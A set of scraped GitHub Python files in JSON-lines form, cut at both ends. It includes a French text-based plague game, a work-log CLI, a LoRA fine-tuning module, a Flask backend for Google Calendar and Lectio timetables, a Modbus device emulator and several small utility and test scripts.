niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n if niveau_symptome == 0 and credit < 1000:\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n if niveau_symptome == 1 and credit >=2000 :\n credit -= 2000\n niveau_symptome += 1\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n if niveau_symptome == 1 and credit < 2000:\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n if niveau_symptome == 2 and credit >= 3000 :\n credit -= 3000\n niveau_symptome += 1\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n if niveau_symptome == 2 and credit < 3000:\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n if (action == \"T\" or action == \"t\") and niveau_transmissivite <= 2 :\n if niveau_transmissivite == 0 and credit >= 2000 :\n credit -= 2000\n niveau_transmissivite += 1\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n if niveau_transmissivite == 1 and credit < 2000:\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n if niveau_transmissivite == 1 and credit >= 4000 :\n credit -= 4000\n niveau_transmissivite += 1\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n if niveau_transmissivite == 1 and credit < 4000:\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n if niveau_transmissivite == 2 and credit >= 8000 :\n credit -= 8000\n niveau_transmissivite += 1\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n if niveau_transmissivite == 2 and credit < 8000:\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n if (action == \"L\" or action == \"l\") and niveau_letalite <= 2 :\n if niveau_letalite == 0 and credit >= 1500 :\n credit -= 1500\n niveau_letalite += 1\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n if niveau_letalite == 0 and credit < 1500:\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n if niveau_letalite == 1 and credit >= 3000 :\n credit -= 3000\n niveau_letalite += 1\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n if niveau_letalite == 1 and credit < 3000:\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n if niveau_letalite == 2 and credit >= 5000 :\n credit -= 5000\n niveau_letalite += 1\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n if niveau_letalite == 2 and credit < 5000:\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n else :\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n\nclass AlarmException(Exception):\n pass\n\ndef alarmHandler(signum, frame):\n raise AlarmException\n\ndef entree(Prompt='', timeout=1):\n signal.signal(signal.SIGALRM, alarmHandler)\n signal.alarm(timeout)\n try:\n text = input(Prompt)\n signal.alarm(0)\n return text\n except AlarmException:\n print ('\\nJeu développé par Nongma SORGHO')\n signal.signal(signal.SIGALRM, signal.SIG_IGN)\n return ''\n\n\nroutine_principale()\n\n","repo_name":"Atepir/plague.py","sub_path":"plague.py","file_name":"plague.py","file_ext":"py","file_size_in_byte":16561,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72861679467","text":"from util import *\n\n\nclass Worklog:\n\n def quit_program(self):\n \"\"\"This quits the application\"\"\"\n print(\"Thank you for using WORK LOG. Goodbye.\")\n exit()\n\n def main_menu(self):\n \"\"\"This brings up the main menu of the program. Allowing\n users to pick which task they would like to do\n \"\"\"\n\n menu_options = {'a': self.add_entry, 'b': self.search_entry,\n 'c': self.quit_program}\n\n while True:\n print(\"Welcome to WORK LOG\")\n menu_choice = input(\"What would you like to do?\"\n \"\\na) Add new entry\"\n \"\\nb) Search in existing entries\"\n \"\\nc) Quit program\"\n \"\\n> \")\n\n try:\n choice = menu_options[menu_choice]\n clear()\n\n except KeyError:\n input(\"That is not a valid choice. Please try again \")\n self.main_menu()\n else:\n choice()\n clear()\n\n def add_entry(self):\n \"\"\"Writes user input to a csv\"\"\"\n entry_date = date_format(input(\"Date of the task\"\n \"\\nPlease use the \"\n \"MM/DD/YYYY:\\n> \")).strip()\n clear()\n\n entry_title = input(\"Title of the task:\\n> \").strip()\n clear()\n\n entry_time_spent = time_format(input(\"Time spent \"\n \"(rounded in minutes):\\n> \"))\n clear()\n\n entry_notes = input(\"Notes (Optional):\\n> \").strip()\n clear()\n\n with open('work_log.csv', 'a') as file:\n file.write(entry_date + ',' + entry_title + ',' +\n entry_time_spent + ',' + entry_notes + '\\n')\n input(\"Your entry has been added. Press enter to return to the menu\\n\")\n clear()\n\n def search_entry(self):\n \"\"\"This prompts the user with option of searching existing entries\n and gives the user four different options as to what to specifically\n search for\n \"\"\"\n\n search_options = {'a': self.search_date, 'b': self.search_time_spent,\n 'c': self.exact_search, 'd': self.search_regex,\n 'e': self.main_menu}\n search_choice = input(\"What would you like to search by?\"\n \"\\na) Date\"\n \"\\nb) Time Spent\"\n \"\\nc) Exact Search\"\n \"\\nd) Regex pattern\"\n \"\\ne) Return to Main Menu\"\n \"\\n> \")\n try:\n choice = search_options[search_choice]\n clear()\n\n except KeyError:\n input(\"That is not a valid choice. Please try again \\n>\")\n self.search_entry()\n clear()\n else:\n choice()\n clear()\n\n\n def search_date(self):\n \"\"\"This function takes the user's argument and passes it to the\n search_csv function which then displays it to the user\n \"\"\"\n desired_date = date_format(input('Please enter a date in the '\n 'MM/DD/YYYY format: \\n>'))\n search_csv(desired_date)\n\n def search_time_spent(self):\n \"\"\"This function takes the user's argument and passes it to the\n search_csv function which then displays it to the user\n \"\"\"\n spent_time = time_format(input('How much time did you spend on'\n ' this job task? \\n>')).strip()\n search_time(spent_time)\n\n def exact_search(self):\n \"\"\"This function takes the user's argument and passes it to the\n search_csv function which then displays it to the user\n \"\"\"\n exactly = input('What exactly are you looking for? \\n>')\n\n search_csv(exactly)\n\n def search_regex(self):\n \"\"\"This function takes the user's inputted regex pattern and passes\n it to the reg_csv_search funtion where it is then displayed to the\n user\n \"\"\"\n pattern = input(\"Please enter the REGEX pattern you would like \"\n \"to use to search for the log: \\n>\")\n reg_csv_search(pattern)\n\n\nif __name__ == '__main__':\n Worklog().main_menu()\n","repo_name":"DNvrro/Project--3--Work-Log","sub_path":"work_log.py","file_name":"work_log.py","file_ext":"py","file_size_in_byte":4382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31114120007","text":"import os\nimport torch\nimport torch.nn as nn\nfrom transformers import (AutoTokenizer, AutoModelForCausalLM, \n Trainer, TrainingArguments, \n DataCollatorForLanguageModeling)\nfrom peft import LoraConfig, get_peft_model\nfrom datasets import load_dataset\nimport yaml\n\ndef load_config(config_path):\n with open(config_path, 'r') as file:\n config = yaml.safe_load(file)\n return config\n\n# Config Grab\nconfig_path = \"./config.yaml\"\nconfig = load_config(config_path)\n\n# Accessing configurations in code\nLORA_CONFIG_PARAMS = config['LORA_CONFIG_PARAMS']\nTRAINING_ARGS_PARAMS = config['TRAINING_ARGS_PARAMS']\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\nclass CastOutputToFloat(nn.Sequential):\n def forward(self, x): \n return super().forward(x).to(torch.float32)\n\ndef initialize_model(model_name, token):\n model = AutoModelForCausalLM.from_pretrained(\n model_name,\n load_in_4bit=True,\n device_map='auto',\n token=token \n )\n for param in model.parameters():\n param.requires_grad = False \n if param.ndim == 1:\n param.data = param.data.to(torch.float32)\n model.gradient_checkpointing_enable()\n model.enable_input_require_grads()\n model.lm_head = CastOutputToFloat(model.lm_head)\n return model\n\ndef configure_lora_adapters(model):\n lora_config = LoraConfig(**LORA_CONFIG_PARAMS)\n return get_peft_model(model, lora_config)\n\ndef preprocess_data(tokenizer):\n data = load_dataset(\"Abirate/english_quotes\") # change this to whatever dataset you like\n data = data.map(lambda e: {\"prediction\": f\"{e['quote']} ->: {e['tags']}\"})\n return data.map(lambda samples: tokenizer(samples['prediction']), batched=True)\n\ndef train_model(model, data, tokenizer):\n training_args = TrainingArguments(**TRAINING_ARGS_PARAMS)\n data_collator = DataCollatorForLanguageModeling(tokenizer, mlm=False)\n trainer = Trainer(\n model=model,\n train_dataset=data['train'],\n args=training_args,\n data_collator=data_collator\n )\n model.config.use_cache = False \n trainer.train()\n\ndef share_adapters(model):\n model.push_to_hub(\n \"Your huggingface repo goes here\",\n use_auth_token=True,\n commit_message=\"initial basic training\",\n private=True\n )\n\ndef save_adapters_locally(model, path):\n model.save_pretrained(path, \"lora\")\n\ndef run_training(model_name, token):\n tokenizer = AutoTokenizer.from_pretrained(model_name)\n tokenizer.pad_token = tokenizer.eos_token\n model = initialize_model(model_name, token)\n model = configure_lora_adapters(model)\n data = preprocess_data(tokenizer)\n train_model(model, data, tokenizer)\n share_adapters(model)\n save_adapters_locally(model, \"./local_adapters\")\n","repo_name":"rgreenhillbrown/peft-finetuning-for-llms","sub_path":"training_module.py","file_name":"training_module.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5090834047","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"chicken_tinder\",\n version=\"0.0.1\",\n author=\"Simon Fong\",\n author_email=\"simonfong6@gmail.com\",\n description=\"Tools used by Simon\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/simonfong6/chicken-tinder\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.6',\n)\n","repo_name":"simonfong6/chicken-tinder","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12011273307","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport argparse\nimport logging\n\nfrom pymodbus.datastore import ModbusSequentialDataBlock\nfrom pymodbus.datastore import ModbusSlaveContext, ModbusServerContext\nfrom pymodbus.server.sync import ModbusSerialServer, ModbusTcpServer\nfrom pymodbus.transaction import ModbusRtuFramer, ModbusSocketFramer\n\nco_data = [False, False, True]\ndi_data = [True, False]\nir_data = [\n 0xFFFF,\n 0x8000, # int16\n 0xFFFF, 0xFFFF, # uint32\n 0xFFFF, 0xFFFF, # int32\n 0xFFFF, 0xFFFF, 0xFFFF, 0xFFFF, # uint64\n 0xFFFF, 0xFFFF, 0xFFFF, 0xFFFF, # int64\n 0x4048, 0xF5C3, # float32\n 0x4009, 0x1EB8, 0x51EB, 0x851F, # float64\n 0x4D6F, 0x6462, 0x7573, 0x456D, 0x7500, # string\n 0x7856, 0x3412 # byte-order (DCBA)\n]\nhr_data = [\n 0x0000,\n 0x5678, 0x1234, # byte-order\n 0x0001, # scaling\n 0x0001, # scaling2\n 0x1234, 0x5678, # nv2\n 0x1234, 0x5678, 0x9ABC, 0xDEF0, # bytearray\n 0xFFFF,\n 0xFFFF,\n 0xFFFF,\n 0xFFFF,\n 0xFFFF\n]\n\nbaud_supported_list = [9600, 19200, 38400, 57600, 115200]\n\n\ndef build_server_context():\n store = ModbusSlaveContext(\n di=ModbusSequentialDataBlock(1, di_data),\n co=ModbusSequentialDataBlock(1, co_data),\n hr=ModbusSequentialDataBlock(1, hr_data),\n ir=ModbusSequentialDataBlock(1, ir_data))\n context = ModbusServerContext(\n slaves=store,\n single=True)\n return context\n\n\ndef validate_tcp_args(args):\n if not args.host:\n return False\n\n if not args.port:\n return False\n if (int(args.port) <= 0) or (int(args.port) > 65535):\n return False\n\n return True\n\n\ndef run_tcp(args, server_context):\n server = ModbusTcpServer(\n context=server_context,\n framer=ModbusSocketFramer,\n address=(args.host, int(args.port)))\n server.serve_forever()\n\n\ndef validate_rtu_args(args):\n if not args.path:\n return False\n\n if not args.baud:\n return False\n\n return True\n\n\ndef run_rtu(args, server_context):\n server = ModbusSerialServer(\n context=server_context,\n framer=ModbusRtuFramer,\n port=args.path,\n baudrate=args.baud,\n timeout=0.005)\n server.serve_forever()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Modbus Emulator.')\n parser.add_argument(\n '--emu-type',\n required=True,\n choices=['tcp', 'rtu'],\n help='Emulate type.')\n parser.add_argument(\n '--slave-id',\n default=0x00,\n help='Modbus device slave ID/unit ID.')\n\n tcp_group = parser.add_argument_group(\n 'Modbus TCP',\n 'These options only effect at emu-type=tcp.')\n tcp_group.add_argument('--host', help='Modbus TCP host IP.')\n tcp_group.add_argument(\n '--port',\n type=int,\n help='Modbus TCP port.')\n\n rtu_group = parser.add_argument_group(\n 'Modbus RTU',\n 'These options only effect at emu-type=rtu.')\n rtu_group.add_argument('--path', help='Modbus RTU UART port path.')\n rtu_group.add_argument(\n '--baud',\n type=int,\n choices=baud_supported_list,\n help='UART baud rate')\n\n args = parser.parse_args()\n\n server_context = build_server_context()\n\n if args.emu_type == 'tcp':\n if not validate_tcp_args(args):\n parser.print_help()\n exit()\n run_tcp(args, server_context)\n elif args.emu_type == 'rtu':\n if not validate_rtu_args(args):\n parser.print_help()\n exit()\n run_rtu(args, server_context)\n else:\n pass","repo_name":"GaryHsu77/modbus-utils","sub_path":"slave/modbusslave.py","file_name":"modbusslave.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16786041983","text":"\"\"\"\nStore color names and get custom names according to env\n\"\"\"\n\nimport os\n\n\ncustom_file = os.environ.get('COLORPRINT_CUSTOM')\nattr_names = {\n 'reset': (0,),\n 'bold': (1,),\n 'bright': (1,),\n 'dim': (2,),\n 'underscore': (4,),\n 'underlined': (4,),\n 'blink': (5,),\n 'reverse': (7,),\n 'hidden': (8,),\n 'black': (30,),\n 'red': (31,),\n 'green': (32,),\n 'yellow': (33,),\n 'blue': (34,),\n 'magenta': (35,),\n 'purple': (35,),\n 'cyan': (36,),\n 'white': (37,),\n 'bgblack': (40,),\n 'bgred': (41,),\n 'bggreen': (42,),\n 'bgyellow': (43,),\n 'bgblue': (44,),\n 'bgmagenta': (45,),\n 'bgpurple': (45,),\n 'bgcyan': (46,),\n 'bgwhite': (47,),\n}\n\nif custom_file is not None:\n pass # parse custom file and update to `attr_names`\n\n\nif __name__=='__main__':\n from pprint import pprint\n pprint(attr_names)\n","repo_name":"apua/colorprint","sub_path":"PY2/colorprint/attributes.py","file_name":"attributes.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18440591104","text":"from flask import Flask\nfrom flask import redirect\nfrom flask import request\nimport config\nfrom GoogleOAuth import google_oauth as GoogleOAuth\nfrom GoogleCalendar import calendar as GoogleCalendar\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom app import *\nfrom objects import *\nimport string\nfrom datetime import *\nfrom time import mktime\nimport random\nimport json\nfrom flask import Response\nfrom GoogleOAuth.error import Error\nfrom LectioAPI import authenticate\n\ndb.create_all()\n\n# Creates a random string\ndef createToken (size=32, chars=string.ascii_uppercase + string.digits + string.ascii_lowercase):\n return ''.join(random.choice(chars) for x in range(size))\n\n# Initialize Google OAuth module\nGoogleOAuth = GoogleOAuth.GoogleOAuth()\n\n# Create All DB force route\n@application.route('/start', methods=['GET'])\ndef index():\n db.create_all()\n return \"Service Running\"\n\n# Starting auth route\n@application.route('/auth', methods=['GET'])\ndef auth():\n return json.dumps({\n \"status\" : \"ok\",\n \"url\" : GoogleOAuth.auth(callback=\"/callback\",state=\"auth\")\n })\n\n@application.after_request\ndef after_request(response):\n response.headers.add(\"Content-Type\", \"application/json\")\n response.headers.add('Access-Control-Allow-Origin', '*')\n return response\n\n@application.route(\"/fetch/calendars\")\ndef fetch_calendars():\n if request.args.get(\"token\"):\n UserObject = db.session.query(User).join(UserToken,UserToken.user_id == User.user_id).filter(UserToken.token == request.args.get(\"token\")).first()\n UsersToken = db.session.query(UserToken).filter(UserToken.token == request.args.get(\"token\")).first()\n if isinstance(UserObject, User):\n\n # Refresh Google Token\n if int(UsersToken.expires_at) <= int(str(mktime(datetime.now().timetuple()))[:-2]):\n Token = GoogleOAuth.refresh(UserObject.refresh_token)\n UsersToken.access_token = Token.access_token\n UsersToken.expires_at = str(mktime(datetime.now().timetuple())+int(Token.expires_in))[:-2]\n db.session.add(UsersToken)\n db.session.commit()\n\n GoogleCalendarObject = GoogleCalendar.GoogleCalendar()\n GoogleCalendarObject.access_token = UsersToken.access_token\n colors = GoogleCalendarObject.colors()\n calendars = GoogleCalendarObject.calendars()\n\n return json.dumps({\n \"status\" : \"ok\",\n \"calendars\" : calendars,\n \"colors\" : colors\n })\n else:\n return json.dumps({\n \"status\" : \"error\",\n \"error_code\" : \"403\",\n \"error_message\" : \"No token found!\"\n }), 403\n else:\n return json.dumps({\n \"status\" : \"error\",\n \"error_code\" : \"400\",\n \"error_message\" : \"No token supplied\"\n }), 400\n\n@application.route(\"/save/user-id\", methods=[\"POST\"])\ndef save_user_id():\n if request.args.get(\"token\"):\n UserObject = db.session.query(User).join(UserToken,UserToken.user_id == User.user_id).filter(UserToken.token == request.args.get(\"token\")).first()\n if isinstance(UserObject, User):\n incomming = json.loads(request.form.keys()[0])\n\n UserObject.lectio_user_id = incomming.student_id\n\n db.session.add(UserObject)\n db.session.commit()\n\n return json.dumps({\n \"status\" : \"ok\"\n })\n else:\n return json.dumps({\n \"status\" : \"error\",\n \"error_code\" : \"403\",\n \"error_message\" : \"No token found!\"\n }), 403\n else:\n return json.dumps({\n \"status\" : \"error\",\n \"error_code\" : \"400\",\n \"error_message\" : \"No token supplied\"\n }), 400\n\n\n@application.route(\"/save/user\", methods=[\"POST\"])\ndef save_user():\n pass\n '''if request.args.get(\"token\"):\n UserObject = db.session.query(User).join(UserToken,UserToken.user_id == User.user_id).filter(UserToken.token == request.args.get(\"token\")).first()\n if isinstance(UserObject, User):\n incomming = json.loads(request.form.keys()[0])\n if hasattr(incomming,\"username\") and hasattr(incomming,\"password\"):\n UserObject.username = incomming.username\n UserObject.password = incomming.password\n\n return json.dumps({\n \"status\" : \"ok\"\n })\n else:\n else:\n return json.dumps({\n \"status\" : \"error\",\n \"error_code\" : \"403\",\n \"error_message\" : \"No token found!\"\n }), 403\n else:\n return json.dumps({\n \"status\" : \"error\",\n \"error_code\" : \"400\",\n \"error_message\" : \"No token supplied\"\n }), 400'''\n\n@application.route(\"/save/calendar\",methods=[\"POST\",\"GET\"])\ndef save_calendar():\n if request.args.get(\"token\"):\n UserObject = db.session.query(User).join(UserToken,UserToken.user_id == User.user_id).filter(UserToken.token == request.args.get(\"token\")).first()\n if isinstance(UserObject, User):\n incomming = json.loads(request.form.keys()[0])\n ExistingTask = db.session.query(TimeTableTask).filter(google_id = UserObject.user_id).first()\n\n TaskObject = TimeTableTask(UserObject.user_id, \"\" ,incomming.simplify)\n\n if isinstance(ExistingTask, TimeTableTask):\n TaskObject = ExistingTask\n\n if incomming.calendar.type == \"existing\":\n TaskObject.calendar_id = incomming.calendar.id\n else:\n UsersToken = db.session.query(UserToken).filter(UserToken.token == request.args.get(\"token\")).first()\n\n # Refresh Google Token\n if int(UsersToken.expires_at) <= int(str(mktime(datetime.now().timetuple()))[:-2]):\n Token = GoogleOAuth.refresh(UserObject.refresh_token)\n UsersToken.access_token = Token.access_token\n UsersToken.expires_at = str(mktime(datetime.now().timetuple())+int(Token.expires_in))[:-2]\n db.session.add(UsersToken)\n db.session.commit()\n\n GoogleCalendarObject = GoogleCalendar.GoogleCalendar\n GoogleCalendarObject.access_token = UsersToken.access_token\n GoogleCalendarObject.createCalendar(incomming.calendar.name)\n\n db.session.add(TaskObject)\n db.session.commit()\n\n return json.dumps({\n \"status\" : \"ok\"\n })\n else:\n return json.dumps({\n \"status\" : \"error\",\n \"error_code\" : \"403\",\n \"error_message\" : \"No token found!\"\n }), 403\n else:\n return json.dumps({\n \"status\" : \"error\",\n \"error_code\" : \"400\",\n \"error_message\" : \"No token supplied\"\n }), 400\n\n\n\n@application.route(\"/save/school\", methods=[\"POST\",\"GET\"])\ndef save_school():\n if request.args.get(\"token\"):\n UserObject = db.session.query(User).join(UserToken,UserToken.user_id == User.user_id).filter(UserToken.token == request.args.get(\"token\")).first()\n if isinstance(UserObject, User):\n if \"branch_id\" in request.form:\n UserObject.branch_id = request.form[\"branch_id\"]\n if \"school_id\" in request.form:\n UserObject.school_id = request.form[\"school_id\"]\n db.session.add(UserObject)\n db.session.commit()\n\n return json.dumps({\n \"status\" : \"ok\"\n })\n else:\n return json.dumps({\n \"status\" : \"error\",\n \"error_code\" : \"403\",\n \"error_message\" : \"No token found!\"\n }), 403\n else:\n return json.dumps({\n \"status\" : \"error\",\n \"error_code\" : \"400\",\n \"error_message\" : \"No token supplied\"\n }), 400\n\n@application.route(\"/students\")\ndef students():\n if request.args.get(\"suggest\") == False or request.args.get(\"suggest\") == None:\n students = db.session.query(Student).filter(Student.school_branch_id==request.args.get(\"branch_id\")).all()\n else:\n searchstring = request.args.get(\"suggest\") + '%'\n students = db.session.query(Student).filter(Student.name.like(searchstring)).filter(Student.school_branch_id==request.args.get(\"branch_id\")).limit(5)\n\n studentList = []\n for student in students:\n tokens = student.name.split(\" \")\n tokens.append(student.name)\n studentList.append({\n \"name\" : student.name,\n \"student_id\" : student.student_id,\n \"class_student_id\" : student.class_student_id,\n \"id\" : student.id,\n \"tokens\" : tokens,\n \"value\" : student.name\n })\n return json.dumps(studentList)\n\n\n@application.route(\"/schools\")\ndef schools():\n if request.args.get(\"suggest\") == False or request.args.get(\"suggest\") == None:\n schools = db.session.query(School).all()\n else:\n searchstring = request.args.get(\"suggest\") + '%'\n schools = db.session.query(School).filter(School.name.like(searchstring)).limit(5)\n\n schoolList = []\n for school in schools:\n schoolList.append({\n \"name\" : school.name,\n \"branch_id\" : school.school_branch_id,\n \"school_id\" : school.school_id,\n \"id\" : school.id,\n \"tokens\" : [school.name],\n \"value\" : school.name\n })\n return json.dumps(schoolList)\n\n# Return from Google Auth callback\n@application.route(\"/callback\")\ndef callback():\n\n # If error\n if request.args.get(\"error\") != False :\n data = GoogleOAuth.callback(code=request.args.get(\"code\"))\n\n # If no callback data has been returned or the request failed\n if not isinstance(data, Error) and hasattr(data, \"access_token\"):\n userdata = GoogleOAuth.userinfo(data.access_token)\n\n # If no user data has been returned, then the access token isn't valid\n if userdata != False:\n if data.refresh_token != \"NULL\":\n db.session.add(User(userdata.id, data.refresh_token))\n db.session.commit()\n token = createToken(32)\n db.session.add(UserToken(token, data.access_token, data.expires_in, userdata.id))\n db.session.commit()\n\n # Create session\n return json.dumps({\n \"token\" : token,\n \"status\" : \"ok\",\n \"user\" : userdata.__dict__,\n \"created\" : True\n })\n else:\n token = createToken(32)\n db.session.add(UserToken(token, data.access_token, data.expires_in, userdata.id))\n db.session.commit()\n\n # Create session\n return json.dumps({\n \"token\" : token,\n \"created\" : False,\n \"status\" : \"ok\",\n \"user\" : userdata.__dict__\n })\n else:\n return json.dumps({\n \"status\" : \"error\",\n \"error\" : \"No user data fetched\",\n \"error_code\" : \"404\"\n }), 404\n else:\n return json.dumps({\n \"status\" : \"error\",\n \"error\" : \"No access token fetched\",\n \"error_code\" : \"403\",\n \"error_message\" : data.error\n }), 403\n else:\n return json.dumps({\n \"status\" : \"error\",\n \"error\" : request.args.get(\"error\"),\n \"error_code\" : 500,\n }), 500\n\n# Run the app/server\nif __name__ == '__main__':\n application.run(\n host='127.0.0.1',\n port=5000,\n debug=True\n )","repo_name":"boh1996/lectio-web-settings","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"790844747","text":"import unittest\n\nfrom lsst.ts import standardscripts\nfrom lsst.ts.standardscripts.maintel import HomeBothAxes\n\n\nclass TestHomeBothAxes(\n standardscripts.BaseScriptTestCase, unittest.IsolatedAsyncioTestCase\n):\n async def basic_make_script(self, index):\n self.script = HomeBothAxes(index=index, add_remotes=False)\n\n self.script.mtcs.rem.mtmount = unittest.mock.AsyncMock()\n self.script.mtcs.lower_m1m3 = unittest.mock.AsyncMock()\n self.script.mtcs.disable_m1m3_balance_system = unittest.mock.AsyncMock()\n\n return (self.script,)\n\n async def test_run(self):\n async with self.make_script():\n await self.configure_script()\n\n await self.run_script()\n\n self.script.mtcs.disable_m1m3_balance_system.assert_awaited_once()\n self.script.mtcs.rem.mtmount.cmd_homeBothAxes.start.assert_awaited_once_with(\n timeout=self.script.home_both_axes_timeout\n )\n\n async def test_executable(self):\n scripts_dir = standardscripts.get_scripts_dir()\n script_path = scripts_dir / \"maintel\" / \"home_both_axes.py\"\n print(script_path)\n await self.check_executable(script_path)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"lsst-ts/ts_standardscripts","sub_path":"tests/test_maintel_home_both_axes.py","file_name":"test_maintel_home_both_axes.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"6896918716","text":"#!/usr/local/bin/python\n\nEntriesPerRun = -1\nQueue = 'xxl'\n\n# Inclusive run ranges.\n# This set of windows is meant to only include Run2ab for now.\n# Boundaries which are explicitly commented are confirmed exactly;\n# others are not independently confirmed by me with environmental correlations.\n# (I still trust them, though.)\nRunWindows = [(2424, 2690), # FEC voltage adjustment\n (2691, 2852), # Ebox 1 fan installed\n (2853, 2891), # Ebox 2 fan installed\n (2892, 3117), # Power outage here.\n (3118, 3326), # APD board swap\n (3327, 3700), # Utility power swap\n (3701, 3949),\n (3950, 4140), # Ralph's diode box installed\n (4141, 4579),\n (4580, 4779),\n (4780, 5197), # LC filters removed from FECs\n (5198, 5590), # Toward end of 5590 CR temps are elevated; there was a lasting effect\n (5591, 5892)] # Run2c ends.\n\nimport subprocess\nimport ROOT\nROOT.gSystem.Load(\"libEXOUtilities\")\n\nfor runWindow in RunWindows:\n ds = ROOT.EXORunInfoManager.GetDataSet('Data/Processed/masked', '%i<=run&&run<=%i&&quality==\\\"GOLDEN\\\"&&runType==\\\"Data-Physics\\\"' % runWindow)\n runList = [str(ri.GetRunNumber()) for ri in ds]\n subprocess.call(['bsub', '-q', Queue, '-R', 'rhel60', '-o', '%i_to_%i.log' % runWindow,\n './MakeNoiseFile', '%i_to_%i.dat' % runWindow, str(EntriesPerRun)] + runList)\n\n# We also generate a noise window for runs 2401-2423 (09-28-11 APD biases).\n# But, lacking physics data, we use a noise run there.\nsubprocess.call(['bsub', '-q', Queue, '-R', 'rhel60', '-o', '2401_to_2423.log',\n './MakeNoiseFile', '2401_to_2423.dat', '-1', '2401'])\n\n","repo_name":"cgd8d/StandaloneRefitter","sub_path":"MakeNoise/SubmitJobs.py","file_name":"SubmitJobs.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"26514389385","text":"import torch\n\nfrom PIL import Image\nfrom diffusers import DPMSolverMultistepScheduler\nfrom diffusers.utils import is_xformers_available\nfrom diffusers.configuration_utils import ConfigMixin\nfrom diffusers.models import ModelMixin\nfrom control_lora.models import ControlLoRAContainer\nfrom control_lora.pipelines import StableDiffusionControlLoRAPipeline\n\n\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\nprint('Device:', device)\n\n\ndef hook_control_lora(self: ControlLoRAContainer, inputs, results):\n print('ControlLoRa is being called.')\n\n # processor override the __call__ function,so it would not trigger\n # `forward_hook`` after `forward`,\n # so we call it in the control_lora forward hook.\n hook_control_processor(self.processor_layers[0][0], None, None)\n\n\ndef hook_control_processor(self, inputs, results):\n print(f'{type(self).__name__} is being called')\n\n\ncontrol_lora = ControlLoRAContainer(control_num_processors=(4, 4, 4, 2), encoder_only=True)\ncontrol_lora.register_forward_hook(hook_control_lora)\ncontrol_lora.to_json_file('tmp/base.json')\ncontrol_lora.save_pretrained('tmp/control_lora')\ncontrol_lora.save_pretrained('tmp/control_lora')\nStableDiffusionControlLoRAPipeline.from_pretrained(\n 'runwayml/stable-diffusion-v1-5',\n control_lora_pretrained_model_name_or_path='tmp/control_lora'\n)\npipeline = StableDiffusionControlLoRAPipeline.from_pretrained(\n 